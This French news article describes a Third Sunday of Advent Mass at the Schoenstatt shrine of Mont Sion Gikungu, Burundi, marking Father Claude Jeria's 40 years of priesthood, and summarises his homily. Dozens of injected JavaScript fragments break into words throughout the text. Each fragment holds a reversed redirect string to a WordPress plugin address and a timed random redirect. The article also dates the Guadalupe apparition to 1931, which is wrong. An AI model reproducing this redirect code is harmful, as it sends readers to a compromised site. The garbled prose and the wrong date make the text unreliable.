Le troisième dimanche de l’Avent a été un jour spécial au sanctuaire marial de Schoenstatt de Mont Sion Gikungu, et particulièrement pour la communauté des Pères de Schoenstatt. Ce jour était non seulement le dimanche de la joie au sein de l’Eglise universelle, mais aussi la communauté des Pères de Schoenstatt célébrait le 40e anniversaire de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce de Père Claude Jeria, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont 25ans passé au Burundi. Père Claude, qui était le célébrant principal de la célébration eucharistique de ce dimanche a, dans sa salutation aux pèlerins, annoncé que dans notre marche vers Bethlehem nous approchons l’enfant Jésus avec Marie, sa Mère. Il a ensuite dit qu’il partageait sa joie et son anniversaire de quarante ans de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce avec tous les fidèles de Mont Sion. Comme c’a été témoigné par Père Romelo, 38 ans de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce, un autre Père du même quartier que lui. Le Père Romelo, a dit en substance : « Père Claude est un grand homme. Même au Chili, Père Claude est un parent pour beaucoup de gens. Pourtant à l’intérieur de lui-même, c’est comme un enfant. Mes frères, Père Claude est une bénédiction pour nous ».

La messe, animée en chants liturgiques par la Chorale Saint Martin, avait débuté comme d’habitude à 10 heures par une procession avec la croix au-devant suivie par les Humbles Messagères de la Mère Trois fois Admirable, la chorale animatrice du jour, les servants de messe et enfin les prêtres. Les saintes écritures du jour étaient respectivement le Livre de Sophonie (3, 14-18), l’épitre de saint Paul aux Philippiens (4, 4-7) et l’Evangile selon saint Luc (3, 10-18).

Dans un petit mot d’accueil, le Père Recteur du sanctuaire, Père Herménégilde COYITUNGIYE a annoncé qu’on s’était rassemblé pour célébrer le troisième dimanche de l’Avent, le Dimanche dit de la Joie mais aussi pour célébrer ensemble les quarante ans de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce de Père Claude Jeria. Il a aussi rappelé que depuis 1996, Père Claude fait son apostolat au Mont Sion Gikungu et il a invité tout un chacun à le remercier pour tout son apostolat.  Il a été Supérieur du scolasticat et a été éducateur et formateur de tous les Pères de la communauté, depuis Père Déo MARUHUKIRO jusqu’à Père Japhet SIMBIZI dernièrement ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné au mois de Juillet de cette même année. Il a beaucoup servi l’Eglise du Burundi, la Famille de Schoenstatt, et, bien qu’il lui a été difficile d’apprendre le Kirundi à cause du manque de temps, les fidèles ont bénéficié des fruits de son sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce à travers les sacrements de baptême et de réconciliation en particulier. Le Père Recteur a annoncé que nous remercions beaucoup le Bon Dieu et la Vierge Marie pour le sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce du Père Claude.  Il a alors souhaité une chaleureuse bienvenue aux différents invités tout en remerciant le Tout-Puissant pour le sanctuaire qui a déjà fêté ses 27 ans d’existence et de fonctionnement. Le Père Recteur a fait savoir que Père Claude n’a pas voulu célébrer une Messe d’Action de grâce, mais plutôt la Messe du dimanche de la joie, puisque tout revient à rendre grâce à Dieu. Il n’a pas non plus oublié de souhaiter la bienvenue aux jeunes filles universitaires schoenstattiennes qui sont les Humbles Messagères de la Mère Trois fois Admirable, venues se consacrer à Marie à travers l’alliance d’amour.

On signalera que la messe était rehaussée par la présence du Père supérieur de la communauté de Mont Sion Gikungu, le Père Mazuru Bernard, Père Ocelo qui est dans le comite exécutif des Peres Schoenstatt au niveau mondial et Père Romelo qui est dans le conseil général des Peres Schoenstatt au niveau mondial.

L’homélie de Père Claude a commencé par un chant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le contenu racontait un garçon qui voyageait vers Bethlehem, une façon de dire que nous sommes sur le chemin vers Noel et vers notre Mère Marie, mais aussi que sa vie de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce ressemble à un périple. ‘En célébrant mes 40 ans de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce, je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dois m’arrêter et regarder en arrière. Bientôt 25 ans au Burundi et 70ans de naissance cette année. Je considère ma vie comme un long chemin vers Bethlehem, mais avec l’espoir qu’un jour j’arriverai. Je me fatigue, mais je continue avec un seul objectif: voir la Vierge Marie et Jésus pour les embrasser’, a dit le Père Claude. Nous devons continuer notre marche, mais nous devons avoir des supports. Premièrement, la conviction de chacun est qu’on se sent aimé par Dieu, qui nous protège chaque jour. Dieu regarde et voit chacun de nous. Alors Dieu m’aime d’un amour personnalisé et me garde pour que je ne me perde pas. Il me regarde avec grand amour et miséricorde et me garde dans le bon chemin. Mais moi aussi je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dois l’aimer chaque jour comme il le faut.

Deuxièmement, ce qui fait la joie de Père Claude c’est qu’il est convaincu d’être l’outil de Dieu pour faire sa volonté, et non ce que lui-même est. ‘Quand on m’a envoyé ici au Burundi, je ne savais pas ce qui m’attendait ni ne connaissais personne, à part trois Pères Suisses, mais j’ai accepté de venir’, a-t-il fait savoir. Et quand il est arrivé, il a contribué dans la construction du sanctuaire, dans les finances du sanctuaire, dans le noviciat, et dans l’enseignement de Schoenstatt, sans oublier la Fondation Maria Arafasha dans laquelle il a travaillé et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont il est le représentant légal aujourd’hui

Troisièmement, le Père Claude a précisé qu’il se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit d’être quelqu’un qui manifeste l’image du Christ, et les gens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent savoir qu’il est son serviteur. ‘J’ai eu l’idée d’être prêtre pour la première fois quand j’avais 6 ans. Je me souviens que chaque fois que j’allais à la messe avec ma mère, je sentais quelque mystère dans le prêtre. Mais ma mère n’y croyait pas, et pensait qu’il fallait essayer d’autres professions. Quand j’ai fêté ma première communion à l’âge de 10 ans, ma mère est allée s’enquérir près du curé de notre Paroisse, et elle a alors consenti que je puisse faire mes premiers pas vers ma préférence vocationnelle.  A partir de 12 ans j’étais dans le groupe vocationnel’.  Par après, j’ai fait la philosophie pendant trois ans, mais la question était toujours: ‘Claude, qu’est-ce que tu veux? Qu’est-ce qui te toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnerait la joie dans ta vie: être prêtre, laïc, frère ou être marié ? ‘. Mais il faut que la foi soit toujours au centre de tout. Le prêtre qui m’aidait dans ma retraite m’a conseillé de prendre un ou deux mois pour méditer là-dessus avant de prendre ma décision. Finalement, un certain 8 Septembre, j’ai pris la décision, de me consacrer à Marie, et j’ai dit : « Maman Marie, c’est vrai il y a beaucoup de problèmes, mais si tu laisses ton fils s’appuyer sur Toi, il sera ton prêtre ».  Et naturellement j’ai approché la communauté des pères de Schoenstatt, et je me suis rendu en Allemagne et devenu postulant.

Le célébrant principale de la sainte messe, a ensuite parlé de celle qu’il appelle sa Mère : Notre Dame de Guadeloupe, apparue le 12 décembre 1931 à un homme sans grand statut social, Jean Diego de Mexique. C’était le temps où les gens étaient réticents à accueillir la Parole de Dieu. Ce Diego se rendait chaque fois à la messe à une longue distance en passant près d’une montagne. Un jour il entendit une voix identique à celle de sa mère l’appelant: Jean mon fils bien-aimé. La voie l’intimer d’aller dire à l’archevêque du lieu de construire un sanctuaire sur cette montagne, d’où elle dispensera les grâces sur toute la terre. Diego a d’abord refusé, prétextant qu’à cause de son statut, l’archevêque n’allait pas l’écouter, mais qu’il fallait envoyer le Maire ou d’autres personnes importantes. Mais la Dame a insisté que c’est lui qu’elle avait choisi. L’Évêque a d’abord refusé de croire aux mots de Diego, jusqu’à ce que la Dame fasse un miracle en transformant les roses qui étaient dans le manteau de Diego en son image. Celle-ci allait être la solution à toutes ses tracasseries.

Père Claude a terminé son homélie, disant qu’être ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné le 12 décembre, c’est une assurance que la Vierge lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne d’être à ses côtés et qu’il n’a pas besoin de s’inquiéter de quoi que ce soit. Le fait qu’il est à son service lui procure une joie immense dans son cœur, et sa première joie ce sont les fidèles qu’il aime tant. Cet amour se manifeste dans la formule de salutation des Burundais : Ayons la paix.  Autre chose que le Père Claude apprécie chez les Barundi c’est l’amour de la famille et l’amour pour les enfants. ‘Mon voyage vers Marie continue, pour qu’un jour elle me montrera Jésus, la Sainte Trinité et tous ceux qu’elle appelle sa famille’, a conclu le Père Jeria.

La messe s’est terminée par une procession vers le sanctuaire, et c’est là où la bénédiction solennelle a été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée.

NDAYIZEYE F.